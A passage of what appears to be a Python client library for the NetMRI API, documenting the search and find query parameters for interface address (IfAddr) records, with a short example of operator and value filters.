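# same parameter to regex matching (here, attributes starting with "10.").
regex = {"query": "/^10\\./"}
```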
| ``api version min:`` 2.3
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param xml_filter: A SetFilter XML structure to further refine the search. The SetFilter will be applied AFTER any search query or field values, but before any limit options; the limit and pagination will be enforced after the filter. Note that this kind of filter may be costly and inefficient if not combined with database-level filtering.
:type xml_filter: String
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return if_addrs: An array of the IfAddr objects that match the specified input criteria.
:rtype if_addrs: Array of IfAddr
"""
return self.api_list_request(self._get_method_fullname("search"), kwargs)
def find(self, **kwargs):
"""Lists the available if addrs matching the input specification. This provides the most flexible search specification of all the query mechanisms, enabling searching using comparison operations other than equality. However, it is more complex to use and will not perform as efficiently as the index or search methods. In the input descriptions below, 'field names' refers to the following fields: AciBdID, AciEpgID, AddrChangedCols, AddrEndTime, AddrStartTime, AddrTimestamp, DataSourceID, DeviceID, IfAddrID, InterfaceID, SubnetIPDotted, SubnetIPNumeric, ifIPDotted, ifIPNumeric, ifIndex, ifNetMaskDotted, ifNetMaskNumeric.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_AciBdID: The operator to apply to the field AciBdID. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. AciBdID: ID of the ACI bridge domain the device is assigned to. For the between operator the value will be treated as an Array if a comma-delimited string is passed, and it must contain an even number of values.
:type op_AciBdID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_AciBdID: If op_AciBdID is specified, the field named in this input will be compared to the value in AciBdID using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_AciBdID must be specified if op_AciBdID is specified.
:type val_f_AciBdID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_AciBdID: If op_AciBdID is specified, this value will be compared to the value in AciBdID using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_AciBdID must be specified if op_AciBdID is specified.
:type val_c_AciBdID: String
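The op_/val_f_/val_c_ triplet above can be sketched as follows (a hedged example; the broker call, which assumes an authenticated client, is left commented out):

```python
# Constant comparison: AciBdID between 100 and 200. For the 'between'
# operator the comma-delimited value must hold an even number of entries.
by_constant = {
    "op_AciBdID": "between",
    "val_c_AciBdID": "100,200",
}
assert len(by_constant["val_c_AciBdID"].split(",")) % 2 == 0

# Field-to-field comparison: val_f_ names another field rather than a
# constant, e.g. rows where SubnetIPNumeric equals ifIPNumeric.
by_field = {
    "op_SubnetIPNumeric": "=",
    "val_f_SubnetIPNumeric": "ifIPNumeric",
}
# if_addrs = client.get_broker("IfAddr").find(**by_constant)
```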
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_AciEpgID: The operator to apply to the field AciEpgID. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. AciEpgID: ID of the ACI EPG the device is assigned to. For the between operator the value will be treated as an Array if a comma-delimited string is passed, and it must contain an even number of values.
:type op_AciEpgID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_AciEpgID: If op_AciEpgID is specified, the field named in this input will be compared to the value in AciEpgID using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_AciEpgID must be specified if op_AciEpgID is specified.
:type val_f_AciEpgID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_AciEpgID: If op_AciEpgID is specified, this value will be compared to the value in AciEpgID using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_AciEpgID must be specified if op_AciEpgID is specified.
:type val_c_AciEpgID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_AddrChangedCols: The operator to apply to the field AddrChangedCols. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. AddrChangedCols: The fields that changed between this revision of the record and the previous revision. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_AddrChangedCols: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_AddrChangedCols: If op_AddrChangedCols is specified, the field named in this input will be compared to the value in AddrChangedCols using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_AddrChangedCols must be specified if op_AddrChangedCols is specified.
:type val_f_AddrChangedCols: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_AddrChangedCols: If op_AddrChangedCols is specified, this value will be compared to the value in AddrChangedCols using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_AddrChangedCols must be specified if op_AddrChangedCols is specified.
:type val_c_AddrChangedCols: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_AddrEndTime: The operator to apply to the field AddrEndTime. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. AddrEndTime: The ending effective time of this revision of this record, or empty if still in effect. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_AddrEndTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_AddrEndTime: If op_AddrEndTime is specified, the field named in this input will be compared to the value in AddrEndTime using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_AddrEndTime must be specified if op_AddrEndTime is specified.
:type val_f_AddrEndTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_AddrEndTime: If op_AddrEndTime is specified, this value will be compared to the value in AddrEndTime using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_AddrEndTime must be specified if op_AddrEndTime is specified.
:type val_c_AddrEndTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_AddrStartTime: The operator to apply to the field AddrStartTime. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. AddrStartTime: The starting effective time of this revision of the record. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_AddrStartTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_AddrStartTime: If op_AddrStartTime is specified, the field named in this input will be compared to the value in AddrStartTime using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_AddrStartTime must be specified if op_AddrStartTime is specified.
:type val_f_AddrStartTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_AddrStartTime: If op_AddrStartTime is specified, this value will be compared to the value in AddrStartTime using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_AddrStartTime must be specified if op_AddrStartTime is specified.
:type val_c_AddrStartTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_AddrTimestamp: The operator to apply to the field AddrTimestamp. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. AddrTimestamp: The date and time this record was collected or calculated. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_AddrTimestamp: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_AddrTimestamp: If op_AddrTimestamp is specified, the field named in this input will be compared to the value in AddrTimestamp using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_AddrTimestamp must be specified if op_AddrTimestamp is specified.
:type val_f_AddrTimestamp: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_AddrTimestamp: If op_AddrTimestamp is specified, this value will be compared to the value in AddrTimestamp using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_AddrTimestamp must be specified if op_AddrTimestamp is specified.
:type val_c_AddrTimestamp: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_DataSourceID: The operator to apply to the field DataSourceID. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. DataSourceID: The internal NetMRI identifier for the collector NetMRI that collected this data record. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_DataSourceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_DataSourceID: If op_DataSourceID is specified, the field named in this input will be compared to the value in DataSourceID using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_DataSourceID must be specified if op_DataSourceID is specified.
:type val_f_DataSourceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_DataSourceID: If op_DataSourceID is specified, this value will be compared to the value in DataSourceID using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_DataSourceID must be specified if op_DataSourceID is specified.
:type val_c_DataSourceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_DeviceID: The operator to apply to the field DeviceID. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. DeviceID: The internal NetMRI identifier for the device containing the interface configured with this address. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_DeviceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_DeviceID: If op_DeviceID is specified, the field named in this input will be compared to the value in DeviceID using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_DeviceID must be specified if op_DeviceID is specified.
:type val_f_DeviceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_DeviceID: If op_DeviceID is specified, this value will be compared to the value in DeviceID using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_DeviceID must be specified if op_DeviceID is specified.
:type val_c_DeviceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_IfAddrID: The operator to apply to the field IfAddrID. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. IfAddrID: The internal NetMRI identifier for this interface address (the specific address configured on this specific interface). For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_IfAddrID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_IfAddrID: If op_IfAddrID is specified, the field named in this input will be compared to the value in IfAddrID using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_IfAddrID must be specified if op_IfAddrID is specified.
:type val_f_IfAddrID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_IfAddrID: If op_IfAddrID is specified, this value will be compared to the value in IfAddrID using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_IfAddrID must be specified if op_IfAddrID is specified.
:type val_c_IfAddrID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_InterfaceID: The operator to apply to the field InterfaceID. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. InterfaceID: The internal NetMRI identifier for the interface configured with this address. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_InterfaceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_InterfaceID: If op_InterfaceID is specified, the field named in this input will be compared to the value in InterfaceID using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_InterfaceID must be specified if op_InterfaceID is specified.
:type val_f_InterfaceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_InterfaceID: If op_InterfaceID is specified, this value will be compared to the value in InterfaceID using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_InterfaceID must be specified if op_InterfaceID is specified.
:type val_c_InterfaceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_SubnetIPDotted: The operator to apply to the field SubnetIPDotted. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. SubnetIPDotted: The network portion of the IP address in dotted (or colon-delimited for IPv6) format. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_SubnetIPDotted: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_SubnetIPDotted: If op_SubnetIPDotted is specified, the field named in this input will be compared to the value in SubnetIPDotted using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_SubnetIPDotted must be specified if op_SubnetIPDotted is specified.
:type val_f_SubnetIPDotted: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_SubnetIPDotted: If op_SubnetIPDotted is specified, this value will be compared to the value in SubnetIPDotted using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_SubnetIPDotted must be specified if op_SubnetIPDotted is specified.
:type val_c_SubnetIPDotted: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_SubnetIPNumeric: The operator to apply to the field SubnetIPNumeric. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. SubnetIPNumeric: The numerical value of the network portion of the IP address. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_SubnetIPNumeric: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_SubnetIPNumeric: If op_SubnetIPNumeric is specified, the field named in this input will be compared to the value in SubnetIPNumeric using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_SubnetIPNumeric must be specified if op_SubnetIPNumeric is specified.
:type val_f_SubnetIPNumeric: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_SubnetIPNumeric: If op_SubnetIPNumeric is specified, this value will be compared to the value in SubnetIPNumeric using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_SubnetIPNumeric must be specified if op_SubnetIPNumeric is specified.
:type val_c_SubnetIPNumeric: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_cap_if_net_deprovisioning_ipv4_ind: The operator to apply to the field cap_if_net_deprovisioning_ipv4_ind. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. cap_if_net_deprovisioning_ipv4_ind: Capability of de-provisioning an ipv4 network from this interface. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_cap_if_net_deprovisioning_ipv4_ind: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_cap_if_net_deprovisioning_ipv4_ind: If op_cap_if_net_deprovisioning_ipv4_ind is specified, the field named in this input will be compared to the value in cap_if_net_deprovisioning_ipv4_ind using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_cap_if_net_deprovisioning_ipv4_ind must be specified if op_cap_if_net_deprovisioning_ipv4_ind is specified.
:type val_f_cap_if_net_deprovisioning_ipv4_ind: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_cap_if_net_deprovisioning_ipv4_ind: If op_cap_if_net_deprovisioning_ipv4_ind is specified, this value will be compared to the value in cap_if_net_deprovisioning_ipv4_ind using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_cap_if_net_deprovisioning_ipv4_ind must be specified if op_cap_if_net_deprovisioning_ipv4_ind is specified.
:type val_c_cap_if_net_deprovisioning_ipv4_ind: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_cap_if_net_deprovisioning_ipv6_ind: The operator to apply to the field cap_if_net_deprovisioning_ipv6_ind. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. cap_if_net_deprovisioning_ipv6_ind: Capability of de-provisioning an ipv6 network from this interface. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_cap_if_net_deprovisioning_ipv6_ind: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_cap_if_net_deprovisioning_ipv6_ind: If op_cap_if_net_deprovisioning_ipv6_ind is specified, the field named in this input will be compared to the value in cap_if_net_deprovisioning_ipv6_ind using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_cap_if_net_deprovisioning_ipv6_ind must be specified if op_cap_if_net_deprovisioning_ipv6_ind is specified.
:type val_f_cap_if_net_deprovisioning_ipv6_ind: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_cap_if_net_deprovisioning_ipv6_ind: If op_cap_if_net_deprovisioning_ipv6_ind is specified, this value will be compared to the value in cap_if_net_deprovisioning_ipv6_ind using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_cap_if_net_deprovisioning_ipv6_ind must be specified if op_cap_if_net_deprovisioning_ipv6_ind is specified.
:type val_c_cap_if_net_deprovisioning_ipv6_ind: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_cap_if_net_provisioning_ipv4_ind: The operator to apply to the field cap_if_net_provisioning_ipv4_ind. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. cap_if_net_provisioning_ipv4_ind: Capability to provision an ipv4 network on this interface. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_cap_if_net_provisioning_ipv4_ind: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_cap_if_net_provisioning_ipv4_ind: If op_cap_if_net_provisioning_ipv4_ind is specified, the field named in this input will be compared to the value in cap_if_net_provisioning_ipv4_ind using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_cap_if_net_provisioning_ipv4_ind must be specified if op_cap_if_net_provisioning_ipv4_ind is specified.
:type val_f_cap_if_net_provisioning_ipv4_ind: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_cap_if_net_provisioning_ipv4_ind: If op_cap_if_net_provisioning_ipv4_ind is specified, this value will be compared to the value in cap_if_net_provisioning_ipv4_ind using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_cap_if_net_provisioning_ipv4_ind must be specified if op_cap_if_net_provisioning_ipv4_ind is specified.
:type val_c_cap_if_net_provisioning_ipv4_ind: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_cap_if_net_provisioning_ipv6_ind: The operator to apply to the field cap_if_net_provisioning_ipv6_ind. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. cap_if_net_provisioning_ipv6_ind: Capability to provision an ipv6 network on this interface. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_cap_if_net_provisioning_ipv6_ind: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_cap_if_net_provisioning_ipv6_ind: If op_cap_if_net_provisioning_ipv6_ind is specified, the field named in this input will be compared to the value in cap_if_net_provisioning_ipv6_ind using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_cap_if_net_provisioning_ipv6_ind must be specified if op_cap_if_net_provisioning_ipv6_ind is specified.
:type val_f_cap_if_net_provisioning_ipv6_ind: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_cap_if_net_provisioning_ipv6_ind: If op_cap_if_net_provisioning_ipv6_ind is specified, this value will be compared to the value in cap_if_net_provisioning_ipv6_ind using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_cap_if_net_provisioning_ipv6_ind must be specified if op_cap_if_net_provisioning_ipv6_ind is specified.
:type val_c_cap_if_net_provisioning_ipv6_ind: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_ifIPDotted: The operator to apply to the field ifIPDotted. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. ifIPDotted: The IP address in dotted (or colon-delimited for IPv6) format. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_ifIPDotted: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_ifIPDotted: If op_ifIPDotted is specified, the field named in this input will be compared to the value in ifIPDotted using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_ifIPDotted must be specified if op_ifIPDotted is specified.
:type val_f_ifIPDotted: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_ifIPDotted: If op_ifIPDotted is specified, this value will be compared to the value in ifIPDotted using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_ifIPDotted must be specified if op_ifIPDotted is specified.
:type val_c_ifIPDotted: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_ifIPNumeric: The operator to apply to the field ifIPNumeric. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. ifIPNumeric: The numerical value of the IP address. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_ifIPNumeric: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_ifIPNumeric: If op_ifIPNumeric is specified, the field named in this input will be compared to the value in ifIPNumeric using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_ifIPNumeric must be specified if op_ifIPNumeric is specified.
:type val_f_ifIPNumeric: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_ifIPNumeric: If op_ifIPNumeric is specified, this value will be compared to the value in ifIPNumeric using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_ifIPNumeric must be specified if op_ifIPNumeric is specified.
:type val_c_ifIPNumeric: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_ifIndex: The operator to apply to the field ifIndex. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. ifIndex: The SNMP interface index of the interface configured with this address. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_ifIndex: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_ifIndex: If op_ifIndex is specified, the field named in this input will be compared to the value in ifIndex using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_ifIndex must be specified if op_ifIndex is specified.
:type val_f_ifIndex: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_ifIndex: If op_ifIndex is specified, this value will be compared to the value in ifIndex using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_ifIndex must be specified if op_ifIndex is specified.
:type val_c_ifIndex: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_ifNetMaskDotted: The operator to apply to the field ifNetMaskDotted. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. ifNetMaskDotted: The network mask value in dotted (or colon-delimited for IPv6) format. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_ifNetMaskDotted: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_ifNetMaskDotted: If op_ifNetMaskDotted is specified, the field named in this input will be compared to the value in ifNetMaskDotted using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_ifNetMaskDotted must be specified if op_ifNetMaskDotted is specified.
:type val_f_ifNetMaskDotted: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_ifNetMaskDotted: If op_ifNetMaskDotted is specified, this value will be compared to the value in ifNetMaskDotted using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_ifNetMaskDotted must be specified if op_ifNetMaskDotted is specified.
:type val_c_ifNetMaskDotted: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_ifNetMaskNumeric: The operator to apply to the field ifNetMaskNumeric. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. ifNetMaskNumeric: The numerical value of the network mask. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_ifNetMaskNumeric: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_ifNetMaskNumeric: If op_ifNetMaskNumeric is specified, the field named in this input will be compared to the value in ifNetMaskNumeric using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_ifNetMaskNumeric must be specified if op_ifNetMaskNumeric is specified.
:type val_f_ifNetMaskNumeric: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_ifNetMaskNumeric: If op_ifNetMaskNumeric is specified, this value will be compared to the value in ifNetMaskNumeric using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_ifNetMaskNumeric must be specified if op_ifNetMaskNumeric is specified.
:type val_c_ifNetMaskNumeric: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_network_id: The operator to apply to the field network_id. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. network_id: The Network View ID assigned to the interface. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_network_id: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_network_id: If op_network_id is specified, the field named in this input will be compared to the value in network_id using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_network_id must be specified if op_network_id is specified.
:type val_f_network_id: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_network_id: If op_network_id is specified, this value will be compared to the value in network_id using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_network_id must be specified if op_network_id is specified.
:type val_c_network_id: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_vrf_description: The operator to apply to the field vrf_description. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. vrf_description: The VRF description of the vrf assigned to the interface. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_vrf_description: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_vrf_description: If op_vrf_description is specified, the field named in this input will be compared to the value in vrf_description using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_vrf_description must be specified if op_vrf_description is specified.
:type val_f_vrf_description: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_vrf_description: If op_vrf_description is specified, this value will be compared to the value in vrf_description using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_vrf_description must be specified if op_vrf_description is specified.
:type val_c_vrf_description: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_vrf_name: The operator to apply to the field vrf_name. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. vrf_name: The VRF name assigned to the interface. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_vrf_name: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_vrf_name: If op_vrf_name is specified, the field named in this input will be compared to the value in vrf_name using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_vrf_name must be specified if op_vrf_name is specified.
:type val_f_vrf_name: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_vrf_name: If op_vrf_name is specified, this value will be compared to the value in vrf_name using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_vrf_name must be specified if op_vrf_name is specified.
:type val_c_vrf_name: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_vrf_rd: The operator to apply to the field vrf_rd. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. vrf_rd: The VRF route distinguisher of the vrf assigned to the interface. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_vrf_rd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_vrf_rd: If op_vrf_rd is specified, the field named in this input will be compared to the value in vrf_rd using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_vrf_rd must be specified if op_vrf_rd is specified.
:type val_f_vrf_rd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_vrf_rd: If op_vrf_rd is specified, this value will be compared to the value in vrf_rd using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_vrf_rd must be specified if op_vrf_rd is specified.
:type val_c_vrf_rd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceGroupID: The internal NetMRI identifier of the device groups to which to limit the results.
:type DeviceGroupID: Array of Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
